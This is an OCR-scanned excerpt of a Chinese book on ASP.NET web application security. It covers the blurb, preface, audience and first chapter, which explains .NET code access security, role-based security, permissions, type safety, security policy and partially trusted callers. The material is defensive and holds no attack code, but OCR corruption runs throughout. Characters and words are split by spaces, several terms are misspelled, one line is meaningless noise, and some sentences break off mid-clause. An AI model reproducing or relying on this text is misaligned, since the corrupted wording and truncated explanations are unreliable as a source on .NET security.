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内 容 简 介 


本 书 对 常见 的 Web 安全 问题 ， 依 照 分 类 的 方式 讲解 每 一 个 知识 点 ， 告 诉 读者 如 何 开发 安全 高 效 的 
Web 系统 ， 如 何 使 自己 的 系统 免 受 黑客 的 攻击 。 本 书 内 容 是 作者 多 年 项 目 实施 和 管理 经 验 的 总 结 ， 在 此 
基础 上 加 以 提炼 ， 试 图 用 最 简明 易 懂 的 方式 介绍 网 站 开发 的 安全 问题 以 及 应 对 措施 ， 内 容 涉及 界面 UI 安 
全 、 代 码 安全 、 中 间 件 安全 、Session 安全 等 ， 并 用 典型 实例 作为 引导 ， 介 绍 各 种 安全 类 库 和 安全 编程 。 

本 书 适合 网 站 开发 人 员 、 应 用 程序 设计 和 开发 人 员 使 用 ， 也 适合 网 站 系统 的 管理 维护 人 员 阅 读 和 
参考 。 
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在 互联 网 中 邀 游 ， 最 让 人 担心 的 3 个 头等 问题 ， 您 知道 都 是 哪些 吗 ? 好 吧 ， 我 来 告诉 
你 ， 它 们 是 : 安全 ! 安全 ! 还 是 安全 ! 

互联 网 每 天 都 在 上 演 着 失去 用 户 信任 和 安全 感 ， 从 而 倒闭 的 悲剧 。 作 为 开发 人 员 的 你 ， 
是 否 为 总 结 安全 点 而 苦恼 ， 为 不 知道 如 何 加 固 功能 点 而 纠结 ? 那么 如 何 才能 设计 出 高 安全 
度 的 网 络 系统 呢 ? 这 个 问题 已 经 关系 到 用 户 对 网 站 系统 的 信任 程度 ， 关 系 到 企业 和 系统 的 
生死 存亡 了 。 在 笔者 看 来 ， 最 关键 的 就 是 设计 思想 和 每 个 功能 点 的 完善 性 。 

时 下 在 网 站 系统 中 使 用 最 广泛 的 就 是 ASP.NET 和 Java 架构 了 。 其 中 .NET 框架 是 微软 
公司 为 了 满足 广大 用 户 的 需求 而 开发 的 一 种 通用 平台 。Java 技术 由 于 没有 公司 做 统一 的 文 
档 编写 ， 导 致 设计 安全 模块 完全 需要 工程 师 自 己 的 经 验 。 这 些 技 术 在 帮助 我 们 方便 、 快 捷 
地 完成 网 站 开发 的 同时 ,在 实际 运行 环境 中 的 黑客 入 侵 和 安全 隐患 也 成 了 不 容 忽 视 的 问题 ， 
这 就 要 求 开 发 人 员 从 设计 和 开发 两 方面 都 要 关注 系统 的 安全 性 。 

在 很 多 人 的 印象 中 ， 安 全 工作 似乎 都 是 在 问题 发 生 后 才 采 取 措 施 。 本 书 旨 在 从 根本 上 
纠正 了 这 一 做 法 ， 通 过 对 .NETWava 平台 安全 问题 的 了 解 ， 做 到 风险 早 避 免 ， 问 题 早 处 理 ， 
在 应 用 程序 开发 的 全 生命 周期 中 严 把 安全 关 ， 保 证 系统 的 正常 、 稳 定 运行 。 


1， 本 书 介绍 


本 书 可 以 分 为 4 部 分 。 第 一 部 分 为 第 1 一 第 3 章 ， 介 绍 了 应 用 安全 的 基本 概念 和 安全 
控件 ， 第 二 部 分 为 第 4 一 第 6 章 ， 讨 论 了 如 何 进 行 数据 加 密 和 验证 ， 第 三 部 分 为 第 7 一 第 
12 章 ， 曾 述 了 如 何 使 用 与 程序 运行 平台 有 关 的 安全 功能 ， 包 括 组 件 安 全 、 会 话 安全 、 代 码 
信任 和 网 站 钓鱼 技术 的 防 与 治 ; 第 四 部 分 为 第 13 一 15 章 , 重点 介绍 了 服务 器 上 如 何 安 全 的 
部 署 你 的 程序 ， 以 及 代码 的 安全 测试 和 审核 。 

2. 本 书 特点 


本 书 最 大 的 特点 就 是 教 读者 对 症 下 药 ， 根 据 不 同 的 功能 点 或 功能 模块 传授 不 同 的 代码 
安全 防范 和 设计 策略 。 书 中 采用 时 下 最 新 的 ASP.NET 4.0 技术 为 范本 ， 讲 解 如 何 将 安全 代 
码 和 防范 技术 植 入 系统 。 通 过 图 文 并 成 的 方式 把 复杂 的 问题 简单 化 ， 让 大 家 知道 应 该 如 何 
去 做 。 

另外 ， 书 中 选用 的 代码 和 实例 都 是 被 验证 过 的 ， 能 够 切实 提升 安全 的 有 效 方法 。 使 得 
读者 在 短期 掌握 别人 长 期 才能 总 结 出 来 的 技术 和 经 验 , 尤其 对 专业 人 员 和 学 生 的 帮助 很 大 。 

本 书 在 设计 方式 和 方法 上 不 受 技术 的 限制 ， 如 果 抛 开 技术 本 身 ， 单 说 设计 方法 该 书 所 
讲解 的 方法 将 使 读者 能 够 “ 依 葫芦 画 标 ”。 

本 书 所 涉及 的 网 站 安全 问题 仅 限 于 学 习 研 究 ， 若 读者 据 此 攻击 他 人 网 站 ， 责 任 自负 。 
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3. 本 书 适用 人 员 


本 书 适合 每 一 位 网 站 开发 人 员 阅 读 ， 作 为 应 用 程序 的 设计 和 开发 人 员 ， 他 们 应 该 了 解 
所 用 语言 安全 性 特点 和 局 限 性 ， 以 便 在 设计 和 编码 过 程 中 进行 安全 性 相关 考虑 。 在 本 书 的 
每 一 章节 ， 都 运用 大 量 实例 ， 帮 助 开 发 人 员 学 习 安 全 服务 配置 和 代码 编写 。 

另外 ， 作 为 应 用 系统 的 管理 维护 人 员 和 用 户 也 应 该 阅读 本 书 。 通 过 本 书 ， 读 者 可 以 清 
晰 地 分 辨 哪些 行为 是 危险 的 ， 而 这 些 行为 是 我 们 每 天 都 会 遇 到 的 。 以 最 常见 的 数据 加 密 和 
身份 验证 为 例 , 了 解 .NET 平台 安全 运行 的 机 制 , 就 可 以 减少 在 系统 操作 过 程 中 的 低级 错误 ， 
避免 安全 隐患 。 
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第 1 章 网 站 安全 技术 概述 


目前 构建 网 站 系统 的 语言 无 外 乎 ASPNET、JSP 或 PHP 等 , 它们 自身 的 安全 性 和 编程 
的 方式 是 否 安全 是 关键 。 随 着 近年 来 NET 技术 和 JSP 越 来 越 为 大 家 所 熟知 , 各 类 基于 它们 
的 Web 应 用 系统 被 广泛 开发 和 应 用 。 特 别 是 基于 .NET 框架 的 ASP.NET 等 技术 使 得 Web 
程序 更 加 容易 开发 和 维护 , 但 Web 应 用 程序 所 带 来 的 安全 漏洞 也 越 来 越 多 , 每 年 由 于 代码 
安全 问题 ， 都 会 造成 巨额 损失 。 目 前 大 部 分 互联 网 犯罪 和 黑客 行为 ， 都 是 通过 网 站 的 漏洞 
展开 的 。 例 如 ,， “世界 著名 社区 网 站 Facebook 近日 测试 新 网 站 的 用 户 界面 ， 其 中 的 一 个 漏 
洞 竟然 导致 网 站 8000 万 用 户 的 生日 信息 被 泄露 。 类 似 的 事情 数不胜数 ， 盛 大 、 联 想 等 公司 
也 都 出 现 过 网 站 被 攻破 的 事件 。 

.NET 框架 本 身 具备 很 多 编写 安全 代码 的 技术 ， 运 用 这 些 技术 ， 可 以 开发 安全 的 Web 
应 用 程序 。 本 章 将 从 程序 安全 性 的 含义 、 用 户 角色 与 代码 访问 、 安 全 模型 、 安 全 类 库 4 个 
方面 讲述 Web 应 用 程序 安全 的 基本 概念 。 








1.1 代码 安全 性 的 含义 


Web 应 用 程序 的 安全 性 主要 包括 代码 访问 的 安全 性 和 基于 角色 的 安全 性 。 

一 般 来 说 ， 这 两 种 安全 性 可 以 互相 渗透 ， 熟 悉 代 码 访问 安全 性 的 开发 人 员 可 以 轻松 使 
用 基于 角色 的 安全 性 ， 而 熟悉 基于 角色 的 安全 性 的 开发 人 员 也 可 以 轻松 地 使 用 代码 访问 的 
安全 性 。 代 码 访问 的 安全 性 和 基于 角色 的 安全 性 都 是 用 公共 语言 运行 库 提供 的 一 个 通用 结 
构 来 实现 的 。 

代码 访问 的 安全 性 和 基于 角色 的 安全 性 使 用 相同 的 模型 和 结构 ， 因 此 它们 共享 若干 基 
础 概念 ， 包 括 安 全 权限 、 类 型 安全 、 安 全 策略 、 主 体 、 身 份 验证 、 授 权 。 


1. 安全 权限 


公共 语言 运行 库 允 许 代码 仅 执行 它 有 权 执行 的 操作 。 运 行 库 通过 权限 对 象 实现 托管 代 
码 的 强制 限制 。 安 全 权限 的 主要 用 途 如 下 : 

(1) 代码 可 以 请 求 需要 的 权限 ，.NET 框架 安全 系统 确定 是 否 允 许 这 样 的 请 求 。 一 般 来 
说 ， 仅 当代 码 的 验证 区 域 值得 授予 这 些 权限 时 ， 系 统 才 会 授予 权限 。 代 码 接收 到 的 权限 不 
会 比 安全 性 设置 所 允许 的 权限 要 多 。 

(2) 运行 库 根据 某 些 条 件 来 授予 代码 权限 ， 这 些 条 件 包 括 代码 标识 的 特性 、 请 求 的 权 
限 和 代码 的 信任 程度 〈 由 管理 员 设 置 的 安全 策略 确定 ) 。 

(3) 代码 可 要 求 其 调用 方 具有 特定 权限 。 如 果 在 代码 上 设置 了 对 特定 权限 的 请 求 ， 则 
使 用 此 代码 的 所 有 代码 也 都 必须 拥有 该 权限 才能 运行 。 
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调用 方 一 般 可 能 拥有 三 类 权限 ， 各 类 权限 都 有 特定 的 用 途 : 

@ 代码 访问 权限 : 表示 对 受 保护 资源 的 访问 权 或 执行 受 保护 操作 的 能 力 。 

@ 标识 权限 : 表示 代码 具有 支持 特定 类 型 的 标识 的 凭据 。 

@ 基于 角色 的 安全 权限 : 确定 用 户 ( 或 用 户 的 代理 ) 具有 特定 的 身份 。Principal- 
Permission 是 唯一 一 个 基于 角色 的 安全 权限 。 

运行 库 在 很 多 命名 空间 中 都 具有 内 置 权 限 类 ， 此 外 ， 运 行 库 还 支持 对 设计 和 实现 自 定 
义 权限 类 。 


2.， 类 型 安全 


类 型 安全 又 称 为 强 类 型 ， 指 不 可 以 将 原始 类 型 强制 的 转换 成 另外 一 个 目标 类 型 ， 从 而 
对 这 个 转换 后 的 原始 类 型 进行 目标 类 型 上 定义 的 操作 。 通 俗 点 讲 ， 类 型 安全 指 的 是 变量 类 
型 定义 后 ， 不 能 再 转换 到 其 他 类 型 〈 非 本 类 型 或 非 本 类 型 的 子 类 型 ) 。 

类 型 安全 和 内 存 安全 的 关系 非常 紧密 ， 类 型 安全 的 代码 只 允许 访问 授权 可 以 访问 的 内 
存 位 置 ， 例 如 不 能 从 其 他 对 象 的 私有 字段 读 取 值 。 在 实时 (Just In Time，JIT) 编译 期 间 ， 
可 选 的 验证 过 程 检查 要 实时 编译 为 本 机 代码 的 元 数据 和 中 间 语 言 (Microsoft Intermediate 
Language，MSIL) ， 以 验证 它们 是 否 为 类 型 安全 。 如 果 代码 具有 忽略 验证 的 权限 ， 则 将 跳 

对 于 托管 代码 来 说 ， 类 型 安全 验证 不 是 强制 的 ， 但 类 型 安全 在 程序 集 隔 离 和 安全 性 强 
制 中 起 着 至 关 重 要 的 作用 。 如 果 代码 是 类 型 安全 的 ， 则 公共 语言 运行 库 可 以 将 程序 集 彼 此 
间 完 全 隔离 。 这 种 隔离 有 助 于 确保 程序 集 之 间 不 会 产生 负面 影响 ， 提 高 了 应 用 程序 的 可 靠 
性 。 即 使 类 型 安全 组 件 的 信任 级 别 不 同 ， 它 们 也 可 以 在 同一 过 程 中 安全 地 执行 。 

如 果 代 码 为 不 安全 的 ， 则 会 出 现 副 作用 。 例 如 运行 库 无 法 阻止 非 托管 代码 调用 到 本 机 
〈 非 托管 ) 代码 和 执行 恶意 操作 。 所 有 非 类 型 安全 的 代码 必须 通过 传递 的 枚 举 成 员 (Skip- 
Verification) 授予 〈SecurityPermission) 后 才能 运行 。 


3. 安全 策略 


安全 策略 是 一 组 可 配置 的 规则 ， 公 共 语 言 运行 库 在 决定 允许 代码 执行 操作 时 遵循 该 策 
人。 安全 策略 由 管理 员 进 行 设 置 ， 并 由 运行 库 强 制 执行 。 运 行 库 帮 助 我 们 确保 代码 只 能 访 
问 或 调用 安全 策略 允许 的 资源 或 代码 。 

每 当 加 载 程序 集 时 ， 运 行 库 就 使 用 安全 策略 确定 授予 程序 集 的 权限 。 在 检查 了 描述 程 
序 集 标识 的 信息 《〈 称 为 证 据 》 后 ， 运 行 库 使 用 安全 策略 决定 代码 的 信任 程度 和 由 此 授予 程 
序 集 的 权限 。 


4. 主体 


主体 代表 一 个 用 户 的 标识 和 角色 以 及 其 拥有 的 用 户 操 作 。NET 框架 中 基于 角色 的 安全 
性 支持 三 种 主体 : 一 般 主体 、Windows 主体 和 自 定义 主体 。 这 里 需要 注意 ， 一 般 主体 独立 
于 Windows 用 户 和 角色 存在 。 

Windows 主体 表示 Windows 用 户 及 其 角色 。Windows 主体 可 模拟 其 他 用 户 ， 这 意味 
着 此 类 主体 在 表示 属于 某 一 用 户 标 识 的 同时 ， 可 代表 此 用 户 对 资源 进行 访问 。 

自 定义 主体 可 由 应 用 程序 以 任何 方式 进行 定义 ， 这 种 类 型 可 以 对 主体 的 标识 和 角色 进 
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行 扩 展 。 
5. 身份 验证 


身份 验证 检查 用 户 的 凭据 ， 并 根据 用 户 的 权限 进行 验证 ， 找 到 主体 标识 。 身 份 验证 期 
间 获 得 的 信息 可 以 直接 由 代码 使 用 。 也 就 是 说 ， 一 旦 找到 了 主体 标识 ， 就 可 以 使 用 NET 
框架 中 基于 角色 的 安全 确定 是 否 允 许 主体 访问 代码 。 

目前 使 用 的 身份 验证 机 制 种 类 繁多 , 其 中 大 多 都 同 .NET 框架 中 基于 角色 的 安全 一 起 使 
用 。 最 常用 的 机 制 有 Passport 机 制 、 操 作 系统 机 制 和 应 用 程序 自 定义 机 制 。 


6. 授权 

授权 是 用 来 确定 是 否 允 许 主体 执行 请 求 操作 的 过 程 。 在 身份 验证 之 后 ， 使 用 主体 标识 
和 角色 信息 来 确定 可 以 访问 的 资源 ， 授 权 使 用 .NET 框架 中 基于 角色 的 安全 性 来 实现 。 

介绍 了 代码 访问 安全 性 和 基于 角色 的 安全 性 共有 的 基本 概念 后 ， 下 面 对 这 两 种 安全 性 
的 机 制 进行 具体 介绍 。 





1.1.1 代码 与 代码 的 安全 域 


1. 概述 


当今 高 度 连接 的 计算 机 系统 会 遇 到 出 自 各 种 来 源 〈 可 能 包括 未 知 来 源 ) 的 代码 。 代 码 
可 能 由 电子 邮件 附带 、 包 含 在 文档 中 或 通过 Intemet 下 载 。 许 多 计算 机 用 户 都 亲身 体验 过 
恶意 代码 〈 包 括 病毒 和 蠕虫 ) 造成 的 严重 后 果 ， 这 些 代 码 可 能 会 损坏 或 毁坏 数据 ， 并 浪费 
时 间 和 资金 。 

多 数 普通 安全 机 制 根据 用 户 的 登录 凭据 〈 通 常 为 密码 ) 赋予 用 户 权 限 ， 并 限制 允许 用 
户 访问 的 资源 〈 通 常 为 目录 和 文件 )。 但 是 ， 这 种 方法 无 法 解决 以 下 几 个 问题 : 用 户 从 许多 
来 源 获取 代码 ， 这 些 来 源 中 可 能 并 不 可 靠 ， 代码 可 能 包含 bug 或 具有 脆弱 性 ， 有 可 能 被 恶 
意 代码 利用 ， 代 码 有 时 候 会 执行 一 些 操作 ， 而 用 户 并 不 知道 。 结 果 ， 当 谨慎 且 可 信 的 用户 
运行 恶意 软件 或 包含 错误 的 软件 时 ， 计 算 机 系统 就 可 能 会 损坏 ， 私 有 数据 发 生 泄漏 。 

多 数 操作 系统 安全 机 制 要 求 每 一 段 代 码 都 必须 完全 受信 任 (Web 页 的 脚本 可 能 除外 )， 
然后 才 可 运行 。 因 此 ， 需 要 一 种 可 广泛 应 用 的 安全 机 制 ， 即 使 两 个 计算 机 系统 之 间 没 有 信 
任 关 系 ， 该 机 制 也 允许 在 一 个 计算 机 系统 上 生成 的 代码 能 够 在 另 一 个 计算 机 系统 上 安全 
执行 。 

为 了 帮助 保护 计算 机 系统 免 受 恶 意 移动 代码 的 危害 ， 让 来 源 不 明 的 代码 安全 运行 ， 防 
止 受信 任 的 代码 有 意 或 无 意 地 危害 安全 ，.NET 框架 提供 了 一 种 称 为 “代码 访问 安全 性 ”的 
安全 机 制 。 代 码 访 问安 全 性 使 代码 可 以 根据 它 所 来 自 的 位 置 以 及 代码 标识 ， 获 得 不 同等 级 
的 受信 度 。 

代码 访问 安全 性 还 实施 不 同 级 别 的 代码 信任 ， 最 大 限度 地 减少 了 必须 完全 信任 才能 运 
行 的 代码 数量 。 使 用 代码 访问 安全 性 ， 可 以 减 小 恶意 代码 或 包含 错误 的 代码 滥用 代码 的 可 
能 性 。 我 们 可 以 指定 允许 代码 执行 的 一 组 操作 ， 同 时 还 可 指定 永远 不 允许 代码 执行 的 一 组 
操作 。 代 码 访问 安全 性 有 助 于 最 大 限度 地 减少 由 于 代码 的 脆弱 性 而 造成 的 损害 。 
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以 公共 语言 运行 库 为 目标 的 托管 代码 都 会 受益 于 代码 访问 安全 性 ， 即 使 托管 代码 不 进 
行 一 次 代码 访问 安全 性 调用 时 也 是 如 此 。 但 是 ， 正 如 代码 访问 安全 性 基础 知识 中 所 描述 的 
那样 ， 所 有 应 用 程序 都 应 该 进行 代码 访问 请 求 。 

代码 访问 安全 性 是 帮助 限制 代码 对 受 保护 的 资源 和 操作 的 访问 权限 的 机 制 。 在 .NET 
框架 中 ， 代 码 访问 安全 性 执行 下 列 功能 : 

(1) 定义 权限 和 权限 集 ， 它 们 表示 访问 各 种 系统 资源 的 权限 。 

(2) 管理 员 能 够 通过 将 权限 集 与 代码 组 关联 来 配置 安全 策略 。 

(3) 代码 能 够 请 求 运行 所 需 权限 ， 指 定 代 码 不 能 拥有 的 权限 。 

(4) 根据 代码 请 求 的 权限 和 安全 策略 允许 的 操作 ， 向 加 载 的 程序 集 授予 权限 。 

(5) 使 代码 能 够 要 求 其 调用 方 拥有 特定 的 权限 。 

(6) 使 代码 能 够 要 求 其 调用 方 拥有 数字 签名 ， 只 允许 特定 组 织 或 特定 站 点 的 调用 方 调 


用 受 保护 的 代码 。 
(7) 比较 调用 堆栈 上 每 个 调用 方 所 授予 的 权限 与 调用 方 必须 拥有 的 权限 ， 加 强 运 行 时 
对 代码 的 限制 。 


为 了 确定 是 否 已 授予 代码 访问 资源 或 执行 操作 的 权限 ， 运 行 库 的 安全 系统 过 历 调用 堆 
栈 ， 比 较 每 个 调用 方 所 授予 的 权限 与 目前 要 求 的 权限 。 如 果 调 用 堆栈 中 的 任何 调用 方 没有 
要 求 权 限 ， 则 会 引发 安全 性 异常 ， 并 拒绝 访问 。 堆 栈 则 在 防止 引诱 攻击 ， 这 种 攻击 中 ， 受 
信 程 度 较 低 的 代码 调用 高 度 信任 的 代码 ， 并 使 用 高 度 信任 的 代码 执行 未 经 授权 的 操作 。 运 
行 时 要 求 所 有 调用 方 都 拥有 权限 会 影响 性 能 ， 但 对 于 帮助 保护 代码 免 遭 受信 程度 较 低 的 代 
码 的 引诱 攻击 至 关 重 要 。 若 要 优化 性 能 ， 可 以 使 代码 执行 较 少 的 堆栈 步 ， 但 是 ， 这 样 做 必 
须 确保 不 会 暴露 安全 缺陷 。 

图 1-1 所 示 为 “程序 集 A4” 中 的 方法 要 求 其 调用 方 拥有 权限 P 时 引起 的 堆栈 步 。 
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假如 A4 的 程序 代码 被 调用 ， 则 需要 权限 





图 1-1 安全 堆栈 步 


代码 访问 安全 性 的 一 种 常见 应 用 场合 是 ， 应 用 程序 将 控件 从 本 地 Intranet 宿主 网 站 直 
接 下 载 到 客户 端 ， 用 户 在 控件 输入 数据 ， 该 控件 是 使 用 安装 的 类 库 生成 的 。 下 面 是 在 此 方 
案 中 使 用 代码 访问 安全 性 的 一 些 方法 。 

(1) 加 载 前 ， 如 果 代 码 拥有 特定 的 数字 签名 ， 则 管理 员 可 配置 安全 策略 ， 指 定 给 予 该 
代码 特殊 权限 ( 比 本 地 Internet 代码 通常 收 到 的 权限 大 )。 默 认 情况 下 ,预定 义 的 LocalIntranet 


。5。 
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命名 权限 集 与 从 本 地 Intranet 下 载 的 所 有 代码 关联 。 

(2) 加 载 时 ， 除 非 控 件 拥 有 受信 任 的 签名 ， 否 则 ， 运 行 库 仅 授予 控件 与 LocalIntranet 
命名 权限 集 关 联 的 权限 。 在 控件 拥有 受信 任 签名 的 情况 下 ， 会 被 授予 与 LocalIntranet 权限 
集 关 联 的 权限 ， 同 时 因为 控件 拥有 受信 任 签名 ， 还 可 能 被 授予 其 他 一 些 权限 。 

(3) 运行 时 ， 每 当 调用 方 〈 在 此 情况 下 为 寄宿 的 控件 ) 访问 公开 受 保护 资源 的 库 或 调 
用 非 托管 代码 的 库 时 ， 该 库 就 会 提出 安全 要 求 ， 导 致 对 调用 方 的 权限 进行 检查 ， 看 调用 方 
是 否 被 授予 了 适当 权限 。 这 些 安全 检查 可 防止 控件 在 客户 端 执 行 未 经 授权 的 操作 。 


2. 基础 知识 


每 种 以 公共 语言 运行 库 为 目标 的 应 用 程序 必须 与 运行 库 的 安全 系统 进行 交互 。 当 应 用 
程序 执行 时 ， 运 行 库 将 自动 进行 计算 ， 然 后 给 出 一 个 权限 集 。 根 据 应 用 程序 获得 的 权限 不 
同 ， 应 用 程序 或 正常 运行 ， 或 发 生 安全 性 异常 。 特 定 计算 机 上 的 本 地 安全 设置 最 终 决 定 代 
码 所 收 到 的 权限 。 这 些 设置 可 能 因 计 算 机 而 异 ， 所 以 无 法 确保 代码 将 收 到 运行 所 需 的 足够 
的 权限 。 这 与 非 托管 开发 领域 不 同 ， 在 非 托管 开发 领域 ， 不 必 担 心 运行 代码 所 需 权限 。 

每 个 开发 人 员 都 必须 熟悉 下 面 的 代码 访问 安全 性 操作 : 

(1) 编写 类 型 安全 代码 : 若 要 使 代码 受益 于 代码 访问 安全 性 ， 必 须 使 用 生成 可 验证 为 
类 型 安全 代码 的 编译 器 。 

(2) 强制 性 语法 和 声明 式 语法 :与 运行 库 安全 系统 的 交互 使 用 强制 性 安全 调用 和 声明 
式 安全 调用 执行 。 声 明 式 调用 使 用 属性 执行 ， 强 制 性 调用 在 代码 中 使 用 类 的 新 实例 执行 。 
有 些 调用 只 能 强制 性 地 执行 ， 而 有 些 调用 只 能 以 声明 方式 执行 。 有 些 调用 可 以 这 两 种 方式 
中 的 任 一 种 方式 执行 。 

(3) 为 代码 请 求 权限 请 求 将 应 用 到 程序 集 范 围 ， 代 码 通 知 运行 库 在 此 范围 内 运行 它 
所 需 的 权限 ， 运 行 库 在 代码 加 载 到 内 存 中 时 计算 安全 请 求 。 代 码 使 用 请 求 通知 运行 库 运行 
所 需 权限 。 

(4) 使 用 安全 类 库 : 类 库 使 用 代码 访问 安全 性 指定 所 需 权 限 。 


3. 通过 部 分 受信 任 的 代码 使 用 类 库 


系统 一 般 不 允许 通过 低 于 完全 信任 级 别 〔 该 信任 级 别 是 运行 库 代 码 访 问安 全 系统 授予 
的 ) 的 应 用 程序 调用 共享 托管 库 ， 除 非 库 编写 器 通过 使 用 AllowPartiallyTrustedCallers 
Attribute 类 明确 允许 调用 。 因 此 ， 应 用 程序 编写 器 必须 注意 在 部 分 受信 任 的 上 下 文中 不 能 
ese pate tensor tnt espinado nh ddim 

。 如 果 代 码 不 会 在 部 分 受信 任 的 上 下 文中 执行 或 被 部 分 受信 任 的 代码 调用 ， 那 么 就 不 需 
ia 中 的 信息 。 但 是 ， 如 果 编 写 的 代码 必须 与 部 分 受信 任 的 代码 交互 或 在 部 分 受信 
任 的 上 下 文中 运行 ， 则 应 该 考虑 以 下 因素 : 

(1) 必须 用 强 名 称 对 库 进 行 签名 ， 这 样 该 库 就 可 以 被 多 个 应 用 程序 共享 。 强 名 称 允 许 
代码 放置 在 全 局 程序 集 缓存 中 ， 并 允许 使 用 者 验证 特定 的 移动 代码 。 

(2) 默认 情况 下 ， 具 有 强 名 称 的 共享 库 自动 为 完全 信任 执行 隐 式 连接 请 求 (Link 
Demand)， 无 须 库 编 写 器 执行 任何 操作 。 

(3) 如 果 调 用 方 不 是 完全 信任 却 仍 尝 试 调用 库 , 则 运行 库 将 引发 安全 处 理 程 序 Security 
Exception， 不 允许 该 调用 方 链接 到 该 库 。 


。6。 
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(4) 为 了 禁用 自动 连接 功能 并 防止 引发 异常 ， 可 以 将 程序 的 局 部 信任 属性 放置 在 共享 
库 的 程序 集 范围 内 ， 此 属性 允许 通过 部 分 受信 任 的 托管 代码 调用 库 。 

(5) 通过 部 分 信任 属性 被 授予 对 库 访 问 权 限 的 部 分 信任 的 代码 仍 需 要 遵循 本 地 计算 机 
策略 定义 的 进一步 限制 。 

(6) 部 分 受信 任 的 代码 无 法 通过 编程 方式 调用 不 具备 AllowPartiallyTrustedCallers 
Attribute 属性 的 库 。 如 果 某 个 应 用 程序 在 默认 情况 下 不 接受 完全 信任 ， 管 理 员 必 须 选 择 修 
改 安全 策略 并 授予 该 应 用 程序 完全 信任 ， 这 样 的 话 ， 应 用 程序 才能 调用 该 库 。 

特定 应 用 程序 专用 库 不 需要 强 名 称 或 AllowPartiallyTrustedCallersAttribute 属性 ， 这 些 
库 也 不 能 被 应 用 程序 之 外 的 潜在 恶意 代码 引用 。 这 样 的 代码 不 会 受到 部 分 受信 任 的 移动 代 
人 码 有 意 或 无 意 的 滥用 ， 无 需 开 发 人 员 或 管理 员 进行 额外 操作 。 

对 于 以 下 类 型 的 代码 ， 应 该 考虑 显 式 启 用 以 供 部 分 受信 任 的 代码 使 用 : 

(1) 已 对 安全 脆弱 性 进行 反复 测试 并 且 符合 安全 代码 指南 中 所 述 准则 的 代码 。 

(2) 专门 为 部 分 受信 任 的 方案 编写 的 具有 强 名称 的 代码 库 。 

(3) 签 有 强 名 称 的 任何 组 件 〈 不 管 是 部 分 受信 任 的 还 是 完全 受信 任 的 )， 这 些 组 件 被 
从 Intermet 或 本 地 Intranet 下 载 的 移动 代码 调用 。 在 默认 安全 策略 下 移动 代码 接受 部 分 信任 ， 
所 以 这 些 组 件 将 受到 影响 。 

(4) 安全 策略 授予 低 于 完全 信任 的 所 有 代码 (如 果 修 改 了 默认 策略 )。 


4. 编写 安全 类 库 


类 库 中 的 编程 失误 会 导致 安全 漏洞 的 公开 ， 这 是 因为 类 库 经 常 访问 受 保护 的 资源 和 非 
托管 代码 。 如 果 设 计 类 库 ， 则 需要 了 解 代 码 访问 安全 性 ， 并 仔细 保护 类 库 。 
表 1-1 所 示 为 保护 类 库 时 需要 考虑 的 3 种 主要 元 素 。 
表 1-1 类 库 保护 元 素 
说 了 明 
要 求 是 一 种 应 用 于 类 级 别 和 方法 级 别 的 机 制 ， 它 要 求 代码 调用 方 拥 有 适当 权限 。 当 调用 代 
人 码 时 , 将 在 堆栈 上 检查 直接 或 间接 调用 代码 的 所 有 调用 方 。 要求 通 常 在 类 库 中 用 来 帮助 保 
护 资源 
重 写 应 用 在 类 和 方法 范围 上 , 为 否决 运行 库 作出 的 某 些 安全 决策 的 方法 。 重 写 在 调用 方 使 
用 代码 时 进行 调用 。 使 用 重 写 可 停止 堆栈 步 ， 并 限制 已 某 些 调用 方 的 访问 权限 
组 合 使 用 要 求 和 重 写 ， 可 以 增强 代码 与 安全 系统 进行 交互 时 的 性 能 


5. 编写 安全 托管 控件 


托管 控件 是 下 载 到 用 户 计算 机 的 网 页 所 引用 的 程序 集 ， 这 些 程序 集 根据 需要 执行 。 从 
代码 访问 安全 性 角度 来 看 ， 有 两 种 类 型 的 托管 控件 : 默认 安全 策略 下 运行 的 控件 和 需要 更 
高 信任 程度 的 控件 。 

若 要 编写 在 默认 安全 策略 下 运行 的 托管 控件 ,只 需要 知道 Intranet 或 Intemet 区 域 默 认 
安全 策略 所 允许 的 操作 即 可 。 只 要 托管 控件 在 执行 时 需要 的 权限 不 超过 它 从 原始 区 域 收 到 
的 权限 ， 该 控件 就 可 以 运行 〈 记 住 ， 管 理 员 或 用 户 可 以 决定 不 授予 代码 来 自 Intermet 或 
Intranet 区 域 的 全 部 权限 )。 若 要 执行 ， 则 需要 更 高 程度 信任 的 托管 控件 ， 管 理 员 或 用 户 必 
须 调整 将 运行 该 代码 的 任何 计算 机 的 安全 策略 。 
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编写 托管 控件 时 应 尽 可 能 使 这 些 控件 需要 默认 情况 下 授予 代码 来 自 Intemet 或 Intranet 
区 域 的 权限 。 对 于 Intemet 区 域 ， 这 意味 着 限制 代码 只 显示 SafeTopLevelWindows 和 
SafeSubWindows〔 由 安全 系统 加 以 完善 ， 从 而 防止 它们 模拟 系统 对 话 框 )， 只 能 与 其 原始 
站 点 进行 通信 ， 并 且 使 用 有 限 的 、 独 立 的 存储 。 

担负 Intranet 上 的 代码 的 权限 稍 大 一 些 。 详 细 信 息 参见 默认 安全 策略 相关 内 容 。 如 果 
控件 需要 访问 文件 、 使 用 数据 库 以 及 收集 有 关 客 户 端 计算 机 的 信息 等 ， 则 该 控件 需要 更 高 
程度 的 信任 。 

1) 开发 

高 度 信任 控件 在 运行 时 采用 的 安全 策略 比 它 们 的 源 〈Intranet 或 Intemet) 通常 认可 的 
安全 策略 的 限制 性 要 低 。 安 全 库 〈 如 .NET Framework 类 ) 发 出 的 多 数 权 限 要 求 执行 堆栈 审 
核 来 检查 所 有 调用 方 ， 以 确保 已 授予 它们 要 求 的 权限 ， 同 时， 出 于 安全 目的 ， 尽 管 网 页 不 
是 托管 代码 ， 但 仍 被 作为 调用 方 处 理 。 执 行 堆栈 审核 技术 是 为 了 帮助 防止 受信 程度 较 低 的 
代码 引诱 高 度 信任 代码 执行 恶意 操作 。 

浏览 器 中 承载 的 托管 控件 可 以 由 网 页 上 的 动态 脚本 操作 ， 所 以 可 以 将 网 页 视 为 调用 
方 ， 并 在 安全 堆栈 审核 技术 中 对 其 进行 检查 ， 防 止 恶 意 网 页 利用 信任 程度 更 高 的 代码 。 将 
网 页 作为 调用 方 处 理 的 结果 是 ， 基 于 其 强 名 称 或 发 行者 证 书 而 被 授予 高 级 别 信任 并 且 从 网 
页 运行 的 控件 ， 将 被 禁止 执行 与 网 页 本 身 出 自 同一 区 域 (Intranet 或 ntermet) 的 代码 所 执行 
的 操作 。 有 关 部 署 注 意 事项 的 更 多 信息 ， 请 参见 1.1.2 节 。 从 表面 上 看 ， 几 乎 不 可 能 编写 高 
